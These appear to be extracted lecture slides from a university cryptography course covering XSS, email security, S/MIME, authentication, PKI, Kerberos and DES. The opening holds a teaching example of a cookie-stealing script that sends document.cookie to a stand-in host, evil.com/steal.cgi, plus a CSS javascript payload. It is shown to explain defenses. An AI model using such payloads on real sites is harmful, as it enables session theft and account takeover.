call hello.cgi on naive.com evil.com/steal.cgi?cookie=”
with this script as “name” +document.cookie)</script>
Welcome!</HTML>
GET/ steal.cgi?cookie=
Interpreted as Javascript
by victim’s browser;
opens window and calls
steal.cgi on evil.com

181
CIS 4520
Introduction to
Cryptography
XSS Attacks
Wenjing Zhang
• Attacker inserts malicious JavaScript into a Web
page or HTML email
• When script is executed, it steals user’s cookies
and hands them over to attacker’s site
• Problem occurs when sites fail to sanitize user
input to strip HTML, so user input is
inserted/injected into HTML response
– strip HTML: to remove or filter out HTML code from
user input before it is inserted into a webpage
– input sanitization: the process of cleaning and validating
user input to ensure that it is safe and conforms to the
expected format before using it in an application

182
CIS 4520
Introduction to
Cryptography
XSS Attacks
Wenjing Zhang
• Why victim’s cookie is returned?
– Javascript from a site can access that site’s cookies
– If Javascript contains malicious code, it can steal
cookies and send them to some other site
• Why would user click on such a link?
– Phishing email in webmail client (e.g. gmail).
– Embed link in double-click banner Ad
– Many ways to fool user into clicking, social engineering
• What if evil.com gets cookie for victim?
– Cookie may include session authentication for victim
and data intended only for victim
– Attacker gain unauthorized access to victim's session on
naive.com, potentially leading to account takeover or
other privacy violations

183
CIS 4520
Introduction to
Cryptography
XSS Attacks
Wenjing Zhang
• Attacker can execute arbitrary scripts in
browser
– To attack other websites
• Can manipulate any DOM component on
victim.com
– Control links on page
– Control form fields on this page and linked
pages
• Example: MySpace.com phishing attack injects
password field that sends password to bad guy
– DOM: Document Object Model
• Data representation of objects that comprise the
structure and content of a webpage
184
CIS 4520
Introduction to
Cryptography
Cybersecurity Incident: MySpace Worm
Wenjing Zhang
• MySpace.com: social networking website founded
in 2003 in the U.S.
• Users can post HTML on their MySpace pages
• MySpace does not allow scripts in users’ HTML
– No <script>, <body>, onclick, <a href=javascript://>
• … but it does allow Javascript in CSS (Cascading
Style Sheets) tags
– <div style=“background:url(‘javascript:alert(1)’)”>
• With careful Javascript hacking
– Samy’s worm: propagates itself through MySpace,
infects anyone who visits an infected MySpace page,
and adds Samy as a friend.
– 5 hourse later, Samy has 1,005,831 friends (1000/s).
– Samy had millions of friends within 24 hours.
185
CIS 4520
Introduction to
Cryptography
Preventing Cross-Site Scripting
Wenjing Zhang
• Preventing injection of scripts into HTML is hard!
• Input checking is difficult
– Blocking “<” and “>” is not enough (“<” and “>” are
used to create malicious payloads that execute
JavaScript, leading to XSS attacks when interpreted by
Ensure that special the browser)
characters are
display on the page
– Many ways to inject: event handlers, stylesheets,
as normal text encoded inputs (%3C, URL encoded form of “<”)
rather than being
interpreted as part
• Preprocess input from user before displaying it on
of the HTML or a web page
script code.
– In PHP: htmlspecialchars(string) is used to replace all
special characters with their HTML codes

– In ASP.NET, Server.HtmlEncode(string) is used

186
CIS 4520
Introduction to
Cryptography
Application Security

• Web Security
Wenjing Zhang

– Phishing
– SQL Injection
– Cross-Site Scripting (XSS)
• Email Security
– Secure Email
– Spaming

187
CIS 4520
Introduction to
Cryptography
Internet Mail Architecture
Wenjing Zhang

Simple Mail
Transfer Protocol
(SMTP)

188
CIS 4520
Introduction to
Cryptography
Email Security

• Threats to the security of e-mail itself

Wenjing Zhang

– Loss of confidentiality
• E-mails are sent in clear over open networks
• E-mails stored on potentially insecure clients and
mail servers
– Loss of integrity
• No integrity protection on e-mails; body can be
altered in transit or on mail server
– Lack of data origin authentication
– Lack of non-repudiation
– Lack of notification of receipt

189
CIS 4520
Introduction to
Cryptography
What are the Options

• Secure the server to client connections

Wenjing Zhang

(easy thing first)

– POP, IMAP over SSH, SSL
– HTTPS access to webmail
– Very easy to configure
– Protection against insecure wireless access
• Secure the end-to-end email delivery

190
CIS 4520
Introduction to
Cryptography
Email based Attacks

• Active content attack

Wenjing Zhang

– Clean up at the server

• Buffer over-flow attack
– Fix the code
• Shell script attack
– Scan before send to the shell
• Trojan Horse Attack
– Use “do not automatically use the macro”
option

191
CIS 4520
Introduction to
Cryptography
Email based Attacks
Wenjing Zhang • Web bugs (tiny, hidden images embedded
in emails to track when an email is opened)
– Modifying image at mail server maintains
visual consistency while disabling tracking

Disable image
auto-loading to
prevent tracking

192
CIS 4520
Introduction to
Cryptography
Application Security

• Web Security
Wenjing Zhang

– Phishing
– SQL Injection
– Cross-Site Scripting (XSS)
• Email Security
– Secure Email
– Spamming

193
CIS 4520
Introduction to
Cryptography
Email SPAM
Wenjing Zhang • Global cost of spam exceeded 17 billion
U.S. dollars in 2020 (Source: Statista)
– includes direct costs such as lost productivity,
costs associated with anti-spam solutions,
potential legal compliance costs, etc.
• SPAM filtering
– Content based – required hits
– White list, Black list
– Defang MIME (Multipurpose Internet Mail
Extensions)
• altering email content so that potentially malicious
elements within email cannot be executed, such as
disabling links or scripts contained within the email.

194
CIS 4520
Introduction to
Cryptography
S/MIME
Wenjing Zhang
• Secure/Multipurpose Internet Mail
Extensions
• Security enhancement to MIME email
– original Internet RFC822 email was text only
– MIME provided support for varying content
types and multi-part messages, e.g., attachment
– with encoding of binary data to textual form
– industry standard for public key encryption
and signing of MIME data
• S/MIME supported in many mail agents
– e.g., MS Outlook, Mozilla, Mac Mail etc.

195
CIS 4520
Introduction to
Cryptography
S/MIME Functions

• enveloped data
Wenjing Zhang

– encrypted content and associated keys

• signed data
Original message
is transformed into – encoded message + signed digest
a different format
for data integrity or – integrity and authenticity of a message
transmission
compatibility, e.g., • clear-signed data
Base64, URL, or
HTML entity – cleartext message + encoded signed digest
encoding.
– integrity and authenticity of a message
• signed & enveloped data
– nesting of signed & encrypted entities
– confidentiality, integrity, and authenticity
196
CIS 4520
Introduction to
Cryptography
S/MIME Cryptographic Algorithms

•
Wenjing Zhang
digital signatures: DSS & RSA
• hash functions: SHA-1 & MD5
• session key encryption: ElGamal & RSA
• message encryption: AES, Triple-DES,
RC2/40 and others
• MAC: HMAC with SHA-1
• have process to decide which algs to use

197
CIS 4520
Introduction to
Cryptography
S/MIME Certificate Processing

• S/MIME uses X.509 v3 certificates

Wenjing Zhang

• managed using a hybrid of a strict X.509

CA hierarchy & PGP’s web of trust
• each client has a list of trusted CA’s certs
• and own public/private key pairs & certs
• certificates must be signed by trusted CA’s

198
CIS 4520
Introduction to
Cryptography
Conclusions

• The Internet works only because we

Wenjing Zhang

implicitly trust one another

• It is very easy to exploit this trust
• The same holds true for software
• It is important to stay on top of the latest
security advisories to know how to patch
any security holes

199
199
CIS 4520
Introduction to
Cryptography
Security Advisories

• Canadian Centre for Cyber Security

Wenjing Zhang

– Government of Canada
– https://www.cyber.gc.ca/en/alerts-advisories

• Cybersecurity and Infrastructure Security

Agency
– U.S. Department of Homeland Security
– https://www.cisa.gov/news-
events/cybersecurity-advisories

200
200
CIS 4520
Introduction to
Cryptography
Security Related URLs
Wenjing Zhang • OWASP (Open Web Application Security
Project)
– https://owasp.org/
• SANS Institute
– https://www.sans.org/CERT
• CERT (Computer Emergency Response
Team)
– https://www.cisa.gov/
• The Hacker News
– https://thehackernews.com/
• SecurityWeek
– https://www.securityweek.com/
201
201
CIS 4520
Introduction to
Cryptography
Slides Refences
Wenjing Zhang

• Purdue University CS 555

• North Carolina School of Science and
Mathematics Cryptography
CIS 4520
Introduction to
Cryptography

Wenjing Zhang CIS 4520 Introduction to Cryptography

Authentication

Wenjing Zhang
[email protected]
CIS 4520
Introduction to
Cryptography
Authentication
Wenjing Zhang • Authentication: proves you are who you
say you are (confirms identity)
• Authentication
– Alice connects to chase.com
• How does Alice know it’s really Chase?
– Alice logs in to use the system
• How does the system know it’s Alice?
• We consider two authentication scenarios
– Server authentication
• Certificate
– User authentication
• With OS
• In a distributed system
2
CIS 4520
Introduction to
Cryptography
Server Authentication Using Certificate
Wenjing Zhang 1. User Action: User enters https://www.cibc.com
in a web browser.
2. Certificate Presentation: The server sends its
digital certificate.
3. Browser Verification: Verifies the digital
signature with the CA's public key.
4. Session Key Encryption: Browser encrypts a
session key using the server's public key.
5. Server Decryption: Server decrypts the session
key using its private key.
6. Secure Session: Browser and server exchange
data encrypted with the session key.

3
CIS 4520
Introduction to
Cryptography
User Authentication
Wenjing Zhang • Operating System (OS) Authentication
– Local Login (e.g., Windows 10):
• Credentials checked against OS security database.
– Access Control:
• Once authenticated, permissions determine access to
files, apps, and settings.
• Distributed System Authentication
– Single Sign-On (e.g., UofG Account):
• One-time login grants access to multiple services
(e.g., email, internal applications such as
webadvisor).
– Multi-Factor Authentication (e.g., IRCC):
• Adds layers of security with additional verification
(e.g., one-time passcode, biometrics).
4
CIS 4520
Introduction to
Cryptography
Certificate

• Bob gets a message claiming to be from

Wenjing Zhang

Alice
– Message is signed with key claiming to be
Alice’s
– Signature matches the message
– That is
• the message m was hashed into h(m), and then
encrypted by a private key into c=E(h(m))
• together with the message m and the encrypted hash
c, Bob also receives a public key that claims to
belong to Alice
• the public key could successfully decrypt c into D(c)
• Bob hashes the message locally, and it does match
with D(c)
5
CIS 4520
Introduction to
Cryptography
Certificate

• Bob gets a message claiming to be from

Wenjing Zhang

Alice
– Message is signed with key claiming to be
Alice’s
– Signature matches the message

– Is Bob sure that it came from Alice?

– How could Bob confirm that the public key
belongs to Alice?

6
CIS 4520
Introduction to
Cryptography
Certificate

• Related question. can I:

Wenjing Zhang

– Take a small picture of myself

– Attach it to a card saying that I’m Joe Biden
– get a free ride on Air Force One?

7
CIS 4520
Introduction to
Cryptography
Certificate

• I tell you my real name

Wenjing Zhang

– How can you verify?

– I can show you my Driver’s License
• I also have a card saying that I’m Biden
– why do you trust a driver's license but not the
ID card that I created saying I’m Biden?

8
CIS 4520
Introduction to
Cryptography
Certificate

• I tell you my real name

Wenjing Zhang

– How can you verify?

– I can show you my Driver’s License
• I also have a card saying that I’m Biden
– why do you trust a driver's license but not the
ID card that I created saying I’m Biden?
– States of America vouches the picture
matches: the name, address, etc. of the info on
the card
– If you trust the States of America, you believe
info on the license

9
CIS 4520
Introduction to
Cryptography
Certificate

• Can we do the same for public keys?

Wenjing Zhang

• When we use https://citi.com/, how do we

know if it’s really Citi Bank?
You trust this
is Citi, if you
trust DigiCert

10
CIS 4520
Introduction to
Cryptography
Certificate
Citi is endorsed by Further endorsed by
Wenjing Zhang DigiCert SHA2 DigiCert High
Extended Validation Assurance EV Root
Sever CA CA

The identify of
the owner of
the website.

The identity of
the entity who
issued the
certificate, i.e.,
the Certificate
Authorities

The end user

certificates
expire in a
year or so.

11
CIS 4520
Introduction to
Cryptography
Certificate
Wenjing Zhang

RSA is used in
this certificate.
Key length:
2048 bits.
Exponent: e
Modulus: n

The crypto
hash values.

12
CIS 4520
Introduction to
Cryptography
Certificate
Wenjing Zhang
Now we look at
DigiCert SHA2
Extended Validation
Sever CA

This certificate
is valid for 15
years.

13
CIS 4520
Introduction to
Cryptography
Certificate
Wenjing Zhang

Now we look at the

root certificate

The root
certificate is
valid for 25
years.

14
CIS 4520
Introduction to
Cryptography
Public-Key Infrastructure (PKI)

• Goal of authentication: bind identity to key

Wenjing Zhang

• Public key: bind identity to public key

– Alice’s identity and Alice’s public key
– Crucial as people will use key to communicate
with principal whose identity is bound to key
– Erroneous binding means no secrecy between
principals
– Assume principal identified by an acceptable
name

15
CIS 4520
Introduction to
Cryptography
Public-Key Infrastructure (PKI)

• RFC 4949 (Internet Security Glossary)

Wenjing Zhang

defines public-key infrastructure (PKI) as

the set of hardware, software, people,
policies, and procedures needed to create,
manage, store, distribute, and revoke
digital certificates based on asymmetric
cryptography.
• The principal objective for developing a
PKI is to enable secure, convenient, and
efficient acquisition of public keys.

16
CIS 4520
Introduction to
Cryptography
Public-Key Infrastructure (PKI)

• Certificate: token (message) containing

Wenjing Zhang

– Identity of principal (here, Alice)

– Corresponding public key
– Timestamp (when issued)
– Other information (perhaps identity of signer)
– Hash (message digest) of token
• Hash encrypted by trusted authority (here,
Cathy) using private key: called a
“signature”

CA = eA || Alice || T || {h(eA || Alice || T )} dC

17
CIS 4520
Introduction to
Cryptography
Public-Key Infrastructure (PKI)

• Alice’s certificate:
Wenjing Zhang

CA = eA || Alice || T || {h(eA || Alice || T )} dC

• Bob gets Alice’s certificate

– If he knows Cathy’s public key, he can
validate the certificate
• Decrypt the encrypted hash using Cathy’s public key
• Re-compute hash from certificate and compare
• Check validity
• Is the principal Alice?
– Now Bob has Alice’s public key
• Alice is endorsed by Cathy!

18
CIS 4520
Introduction to
Cryptography
Public-Key Infrastructure (PKI)

• Alice’s certificate:
Wenjing Zhang

CA = eA || Alice || T || {h(eA || Alice || T )} dC

• Problem: Bob needs Cathy’s public key to

validate certificate
– That is, secure distribution of public keys
– Solution: Public Key Infrastructure (PKI)
using trust anchors called Certificate
Authorities (CAs) that issue certificates

19
CIS 4520
Introduction to
Cryptography
Public-Key Infrastructure (PKI)

• Hierarchical CAs with cross-certification

Wenjing Zhang

– Multiple root CAs that are cross-certified

• Web Model
– Browsers or Operating Systems come pre-
configured with multiple trust anchor
certificates
– New certificates can be added (be careful!)
– Bad certificate can be revoked.
• Distributed model (e.g., PGP)
– No CA; instead, users certify each other to
build a “web of trust”

20
CIS 4520
Introduction to
Cryptography
Authentication
Wenjing Zhang • Authentication: proves you are who you
say you are (confirms identity)
• Authentication
– Alice talks with Bob
• How does Bob know it’s Alice?
– Alice logs in to use the system
• How does the system know it’s Alice?
• We consider two authentication scenarios
– Server authentication
• Certificate
– User authentication
• With OS
• In a distributed system
21
CIS 4520
Introduction to
Cryptography
Authentication

• Credentials can be
Wenjing Zhang

– Something I am (e.g., fingerprint)

– Something I have (e.g., security token)
– Something I know (e.g., password)
• Passwords
– Used to authenticate users in OS, web, email,
etc.

22
CIS 4520
Introduction to
Cryptography
Password Authentication
Wenjing Zhang
• Passwords are pretty weak……
• SplashData’s Worst Passwords List: most commonly used
passwords in 2015 (from 2M+ leaked passwords)

23
CIS 4520
Introduction to
Cryptography
Password Authentication
Wenjing Zhang
• Passwords are pretty weak……
• SplashData’s Worst Passwords List: most commonly used
passwords in 2018
1 123456 Unchanged 14 666666 New
2 password Unchanged 15 abc123 Unchanged
3 123456789 Up 3 16 football Down 7
4 12345678 Down 1 17 123123 Unchanged
5 12345 Unchanged 18 monkey Down 5
6 111111 New 19 654321 New
7 1234567 Up 1 20 !@#$%^&* New
8 sunshine New 21 charlie New
9 qwerty Down 5 22 aa123456 New
10 iloveyou Unchanged 23 donald New
11 princess New 24 password1 New
12 admin Down 1 25 qwerty123 New
13 welcome Down 1

24
CIS 4520
Introduction to
Cryptography
Password Authentication

• What if the bad guy gets your password

Wenjing Zhang

file?
– Aside: this has happened a lot. Many of them
through SQL injection attack.
• Instead of storing cleartext passwords
– Store passwords transformed through some
one-way function, e.g. the hash of the
password.
• When user sends password
– System takes hash of the password, H(pass)
– Check H(pass) == what’s in password file

25
CIS 4520
Introduction to
Cryptography
Password Authentication

• Password crackers
Wenjing Zhang

– Brute force
– Dictionary based
• What if the bad guy manages to get the
hashed password h(p)
– Hash the terms in the dictionary, and compare
them with h(p)
– Counter measure: we can make the h()
function very slow, or hash it many times.
• If it takes 0.1 second to compute hash – doesn’t
matter in real-world applications.
• However, the adversary could only test 600
passwords in a minute.
26
CIS 4520
Introduction to
Cryptography
Password Authentication

• What if the bad guy pre-computes h(p) for

Wenjing Zhang

all entries in the dictionary?

– Rainbow table: contains pre-computed hashes
for a large number of possible passwords.
– Yes, you can purchase from the Internet.

27
CIS 4520
Introduction to
Cryptography
Password Authentication
Wenjing Zhang

NTLM: MS’s
NT Lan
Manager

28
CIS 4520
Introduction to
Cryptography
Password Authentication
Wenjing Zhang • What if the bad guy pre-computes h(p) for
all entries in the dictionary?
– Rainbow table
– Yes, you can purchase from the Internet.
• Counter measure: salt
– Add randomness to password hash
– Random data called salt
– Example: Cryptographically Secure Pseudo-
Random Number Generator (CSPRNG)

29
CIS 4520
Introduction to
Cryptography
Password Authentication

• Future of password authentication

Wenjing Zhang

– Graphical passwords?
• Android: patterns
– Biometrics?
• uses unique physical characteristics for
identification
• Face recognition
• Fingerprint
– Two-factor authentication? (Knowledge
Factor + Possession Factor)
• password + token
• password + something like SecureID
• password + biometrics

30
CIS 4520
Introduction to
Cryptography
Distributed Authentication

• In a distributed environment?
Wenjing Zhang

– Key management
– Secret key: if there are N entities, N2 shared
keys would be needed
– PKI: if there are N entities, N (public, private)
key pairs would be needed

– A better solution?

31
CIS 4520
Introduction to
Cryptography
What is Kerberos?
Wenjing Zhang • Computer-network authentication protocol
– one of the best-known and most widely implemented
trusted third-party key distribution systems
– developed at MIT in the mid-1980s
• Provide strong authentication for client/server
applications in a distributed environment, using
secret-key cryptography.
– user types in a password and logged into a workstation.
On behalf of the user, the workstation authenticates and
accesses resources seamlessly
– allows users access to services distributed through
network
– without needing to trust all workstations
– rather all trust a central authentication server
• Two versions in use: 4 & 5
32
CIS 4520
Introduction to
Cryptography
What is Kerberos?
Wenjing Zhang
• Cerberus (Kerberos in Greek)
– In Greek mythology, a many-headed dog, the guardian
of the entrance of Hades
• Practical Uses of Kerberos
– Microsoft Windows
– Email, FTP, network file systems, many other
applications have been kerberized
• Use of Kerberos is transparent for the end user
• Transparency is important for usability!
– Local authentication
• login and su in OpenBSD
– Authentication for network protocols
• rlogin, rsh
– Secure windowing systems: graphical user interface
(GUI) environments designed with security features
33
CIS 4520
Introduction to
Cryptography
Design Rationales Behind Kerberos

• To reduce the amount of information each

Wenjing Zhang

individual system needs to maintain.

• Less work on servers (KDC and Bob),
more work on clients
– A client requests credentials (ticket + session key)
and manage them; KDC and Bob do not keep a
record of but only verify user credentials (except
authenticators to avoid replay attacks)
– More scalable in a large distributed system
• Less communication overhead
– Tickets' time-limited, multi-time-use nature within
their validity period reduces authentication-related
messages.
34
CIS 4520
Introduction to
Cryptography
Many-to-Many Authentication
Wenjing Zhang

35
CIS 4520
Introduction to
Cryptography
Requirements for Distributed
Wenjing Zhang
Authentication

• Security
– … against attacks by passive eavesdroppers
and actively malicious users
• Transparency (user-friendly)
– Users shouldn’t notice authentication taking
place
– Entering password is Ok, if done rarely
• Scalability
– Large number of users and servers

36
CIS 4520
Introduction to
Cryptography
Threats

• User impersonation
Wenjing Zhang

– Malicious user with access to a workstation

pretends to be another user from the same
workstation
• Network address impersonation
– Malicious user changes network address of his
workstation to impersonate another workstation
• Eavesdropping, tampering, replay
– Malicious user eavesdrops, tampers, or replays
other users’ conversations to gain unauthorized
access

37
CIS 4520
Introduction to
Terms
Cryptography

Wenjing Zhang • Password

– Static knowledge to verify a user's identity.
• Token
– A physical device or software used to generate
one-time codes (e.g. PIN).
• Ticket
– A time-limited electronic credential (block of
data) issued by an authentication system,
allowing a user to access a service during a
particular session, encrypted with secret key.
• Authenticator
– One-time-use encrypted data structure created
by the client, proof of identity.
38
CIS 4520
Introduction to
Cryptography
Solution: Trusted Third Party
Wenjing Zhang

39
CIS 4520
Introduction to
Cryptography
Naive Authentication
Wenjing Zhang

40
CIS 4520
Introduction to
Cryptography
Two-Step Authentication?
Wenjing Zhang

41
CIS 4520
Introduction to
Cryptography
Threats
Wenjing Zhang
• Ticket hijacking
– Malicious user may steal the service ticket of
another user on the same workstation and use it
– Servers must verify that the user who is
presenting the ticket is the same user to whom the
ticket was issued
• No server authentication
– Attacker may misconfigure the network so that he
receives messages addressed to a legitimate server
• Capture private information from users and/or deny
service
– Servers must prove their identity to users

42
CIS 4520
Introduction to
Cryptography
Overview of Kerberos
Wenjing Zhang

43
CIS 4520
Introduction to
Cryptography
Symmetric Keys in Kerberos
Wenjing Zhang

44
CIS 4520
Introduction to
Cryptography
Phase 1: “Single Logon” Authentication
Wenjing Zhang

45
CIS 4520
Introduction to
Cryptography
Phase 2: Obtaining a Service Ticket
Wenjing Zhang

46
CIS 4520
Introduction to
Cryptography
Phase 3: Obtaining Service
Wenjing Zhang

47
CIS 4520
Introduction to
Ticket vs. Authenticator
Cryptography

• Ticket
Wenjing Zhang

– similar to a "passport" issued by the TGS that

grants the user time-limited permission to
access a service and contains the necessary
details to establish a secure session.
• Authenticator
– a one-time-use proof of identity that shows the
user is currently active and is the one
presenting the ticket to the service.

48
CIS 4520
Introduction to
Cryptography
Summary of Kerberos Negotiations
Wenjing Zhang

Source:
Wikipedia
49
CIS 4520
Introduction to
Cryptography
Kerberos in Large Networks
Wenjing Zhang

• One KDC isn’t enough for large networks

• Network is divided into realms
– KDCs in different realms have different key databases
• To access a service in another realm, users must…
– Get ticket for home-realm TGS from home-realm KDC
– Get ticket for remote-realm TGS from home-realm TGS
• As if remote-realm TGS were just another network service
– Get ticket for remote service from that realm’s TGS
– Use remote-realm ticket to access service
– N(N-1)/2 key exchanges for full N-realm interoperation

50
CIS 4520
Introduction to
Cryptography
Important Ideas in Kerberos
Wenjing Zhang
• Short-term session keys
– Long-term secrets used only to derive short-term keys
– Separate session key for each user-server pair
• Re-used by multiple sessions between same user and server

• Proofs of identity based on authenticators

– Client encrypts his identity, addr, time with session key;
knowledge of key proves client has authenticated to
KDC
• Also prevents replays (if clocks are globally synchronized)
– Server learns this key separately (via encrypted ticket
that client can’t decrypt), verifies client’s authenticator
• Symmetric cryptography only

51
CIS 4520
Introduction to
Cryptography
Kerberos Version 5
Wenjing Zhang
• Better user-server authentication
– Separate subkey for each user-server session instead of
re-using the session key contained in the ticket
– Authentication via subkeys, not timestamp increments
• Authentication forwarding (delegation)
– Servers can access other servers on user’s behalf, e.g.
can tell printer to fetch email
• Realm hierarchies for inter-realm authentication
• Explicit integrity checking + standard CBC mode
• Multiple encryption schemes, not just DES

52
CIS 4520
Introduction to
Cryptography
Kerberos V4 vs. V5

• Authentication forwarding/delegation: V4
Wenjing Zhang

does not allow and V5 allows

• Inter-realm authentication: no chaining in
V4 (N realms require O(N2) Kerberos-to-
Kerberos relationships), V5 supports KDC
hierarchy
• Session keys: negotiation of sub-session
keys is supported in V5 for different
sessions of the same service type
• Privacy + integrity: V4 uses PCBC, V5
uses explicit integrity mechanisms (e.g.,
hash) with CBC encryption
53 53
CIS 4520
Introduction to
Cryptography
Summary
Wenjing Zhang

Symmetric key problem: Public key problem:

• How do two entities • When Alice obtains
establish shared secret key Bob’s public key (from
over network? web site, e-mail,
Solution: diskette), how does she
know it is Bob’s public
• trusted key distribution key, not Trudy’s?
center (KDC) acting as
intermediary between Solution:
entities • trusted certification
authority (CA)

54
CIS 4520
Introduction to
Cryptography
Symmetric Key Distribution with KDC
Wenjing Zhang
• Typically used within private or internal networks
• Corporate Security:
– Enterprise Wi-Fi Security: WPA-Enterprise encryption for Wi-Fi
where the KDC part of RADIUS servers authenticates users.
– Single Sign-On (SSO) Systems: Centralized authentication services
allowing users to log in once and access multiple applications securely.
• Telecommunications:
– 4G/5G Networks: Mobile networks use KDCs to manage encryption
keys for securing communication between cell phones and network
towers.
– VoIP Services: Encrypted voice communication services such as Skype
for Business where KDCs facilitate secure key exchange for sessions.
• Streaming:
– Media Streaming Services: Platforms like Netflix use session keys for
DRM protection, often distributed by a KDC-like system.
• Financial Services:
– ATM Transactions: Banks use KDCs to authenticate and secure
communications between ATMs and their network.
55
CIS 4520
Introduction to
Cryptography
Public Key Infrastructure with CA
Wenjing Zhang
• Typically used on the public internet
• Online Banking: Websites use SSL/TLS certificates from
CAs for secure customer transactions.
• Software Updates: Microsoft, Apple, and others use CA-
signed certificates for authenticating updates.
• Email Encryption: Outlook and other email clients utilize
S/MIME with CA verification for secure communication.
• Document Signing: Adobe Acrobat allows CA-verified
digital signatures on PDFs.
• Mobile App Stores: App Store and Google Play use CA-
signed certificates to verify app integrity.
• SSH for Servers: System administrators use CA-signed SSH
keys for secure server access.

56
CIS 4520
Introduction to
Cryptography
Summary
Wenjing Zhang
• The basic mechanisms of Trusted Third
Parties for distributed authentication using
different crypto methods
– Symmetric key: KDC (Key Distribution Center,
the key concept of ticket)
– Asymmetric key: CA (Certification Authority,
the heart of X.509 standard )
• The practical protocols of distributed
authentication
– Symmetric key: Kerberos
– Asymmetric key: X.509 (will be introduced in
the lecture on Network Security)
57
CIS 4520
Introduction to
Cryptography
Wrap-up

• What have we covered?

Wenjing Zhang

– Cryptography
• Basic concepts
• Classic Cryptography
• Modern symmetric cryptography
• Asymmetric cryptography
• Cryptographic hash
– Authentication
• Password-based authentication
• Authentication in a distributed system
• The Public Key Infrastructure

58
CIS 4520
Introduction to
Cryptography
Slides Refences
Wenjing Zhang

• Prof. Vitaly Shmatikov, Cornell University

CIS 4520
Introduction to Outline for Next Class: Network
Cryptography
Security
Wenjing Zhang

Wenjing Zhang CIS 4520 Introduction to Cryptography

Modern Cryptography

Wenjing Zhang
[email protected]
CIS 4520
Introduction to
Cryptography
Modern Cryptography

• Post-WW-II cryptography
Wenjing Zhang

• Secret key cryptography (symmetric

cryptography)
– DES
– AES
• Public key cryptography (asymmetric
cryptography)
– RSA

2
CIS 4520
Introduction to
Cryptography
Introduction to DES

• Early 70s: non-military crypto research

Wenjing Zhang

was very unfocused

• 1972: National Bureau of Standards (now
NIST) wanted a crypto algorithm which is:
– secure Still remember the
– open Kerckhoffs’ Law?

– efficient
– useful in diverse applications
• First open solicitation: May 1973
• Second solicitation: August 1974

3
CIS 4520
Introduction to
Cryptography
Introduction to DES

• In response to NBS’s second solicitation,

Wenjing Zhang

IBM submitted Lucifer

• DES based on Lucifer
• DES first published in 1975, seeking
public scrutiny
• DES became a federal standard in 1976
• …
• 26 years!
• …
• DES was superseded by AES in 2002

4
CIS 4520
Introduction to
Cryptography
Recap: Stream and Block Ciphers

• Block ciphers process messages in blocks,

Wenjing Zhang

each of which is then en/decrypted

– like a substitution on very big characters
– 64-bits or more

• Stream ciphers process messages a bit or

byte at a time when en/decrypting

• Many current ciphers are block ciphers

– better analyzed
– broader range of applications
5
CIS 4520
Introduction to
Cryptography
Recap: Stream and Block Ciphers
Wenjing Zhang

6
CIS 4520
Introduction to
Cryptography
Introduction to DES

• DES: Data Encryption Standard

Wenjing Zhang

– Block cipher. 64-bit blocks

– same algorithm used for encryption and
decryption
– 56-bit keys (effective key length: 56!)
• represented as 64-bit
• but every 8th bit is for parity only
– symmetric: receiver uses same key to decrypt

7
CIS 4520
Introduction to
Cryptography
Introduction to DES

• DES: Data Encryption Standard

Wenjing Zhang

• Uses two primitive cryptographic

operations seen before:
– substitution (S-box) provides confusion
– permutation (P-box) provides diffusion

• Uses standard arithmetic and logical

operators
– efficient hardware implementations

8
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

DES Encryption
Overview
9
CIS 4520
Introduction to
Cryptography
DES

• Break up plaintext into 64-bit blocks

Wenjing Zhang

• Each block goes through 16 rounds

• Same process 16 times/block
– Bi = block after iteration i
– Li = Left half of block after iteration i
• 32 bits
– Ri = Right half of block after iteration i
• 32 bits.

10
CIS 4520
Introduction to
Cryptography
DES
Wenjing Zhang • For each block
– Initial permutation
– 16 rounds of substitution and permutation
– Final permutation
• Each round (Feistel cipher 𝑓):
– Li = Ri - 1
Li-1 Ri-1
– Ri = Li−1⊕ f (Ri−1, ki)
Ki
f

Li Ri
11
CIS 4520
Introduction to
Cryptography
DES

• Initial Permutation
Wenjing Zhang

58 50 42 34 26 18 10 2 60 52 44 36 28 20 12 4
62 54 46 38 30 22 14 6 64 56 48 40 32 24 16 8
57 49 41 33 25 17 9 1 59 51 43 35 27 19 11 3
61 53 45 37 29 21 13 5 63 55 47 39 31 23 15 7

• Performed before 16 rounds of encryption

– Move bit 58 to position 1, move bit 50 to
position 2, etc…
• Reversed by Inverse Initial Permutation
(a.k.a. final permutation) (after round 16)
• Does not add to security!!
– This is not a transposition cipher since the
algorithm is public!
12
CIS 4520
Introduction to
Cryptography
Overview of DES Round Structure

• Uses two 32-bit L & R halves

Wenjing Zhang

• Uses Feistel cipher 𝑓 as round function:

– Li = Ri - 1
– Ri = Li−1⊕ f (Ri−1, ki)
• 𝑓 takes 32-bit R half and 48-bit subkey:
– expands R to 48 bits using Expansion
permutation
– adds to subkey using XOR
– passes through 8 S-boxes to get 32-bit result
– finally permutes using 32-bit permutation

13
CIS 4520
Introduction to
Cryptography
DES

• Each round (Feistel cipher 𝑓):

Wenjing Zhang

– Li = Ri - 1
– Ri = Li−1⊕ f (Ri−1, ki)

Li-1 Ri-1

Ki
f

Li Ri
14
CIS 4520
Introduction to
Cryptography
DES: Round Function F

• Each round:
Wenjing Zhang
The Feistel (F) function
32 bit 32 bit 56 bit

48 bit
48 bit

32 bit

15
CIS 4520
Introduction to
Cryptography
DES
Wenjing Zhang
• Expansion permutation
32 bit
– R: from 32 bits to 48 bits
– Some bits used twice
32 1 2 3 4 5
4 5 6 7 8 9
48 bit Ki:48 bit
8 9 10 11 12 13
12 13 14 15 16 17
16 17 18 19 20 21
20 21 22 23 24 25
24 25 26 27 28 29
28 29 30 31 32 1

Right Half i-1 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

32 1 2 3 4 5 4 5 6 7 8 9 8 9 10 11 12 13 12 13 14 15 16 17 16 17 18 19 20 21 20 21 22 23 24 25 24 25 26 27 28 29 28 29 30 31 32 1

16
CIS 4520
Introduction to
Cryptography
DES

• Expansion permutation
Wenjing Zhang 32 bit

– R: from 32 bits to 48 bits

– Some bits used twice
• few bits of plaintext may affect
48 bit
many bits of ciphertext Ki:48 bit

– R becomes the same length

as round-key for XOR

17
CIS 4520
Introduction to
Cryptography
DES

• XOR with key

Wenjing Zhang 32 bit

– “Key mixing”
– Simple bit-wise XOR with
round-i-key Ki (48 bits!)
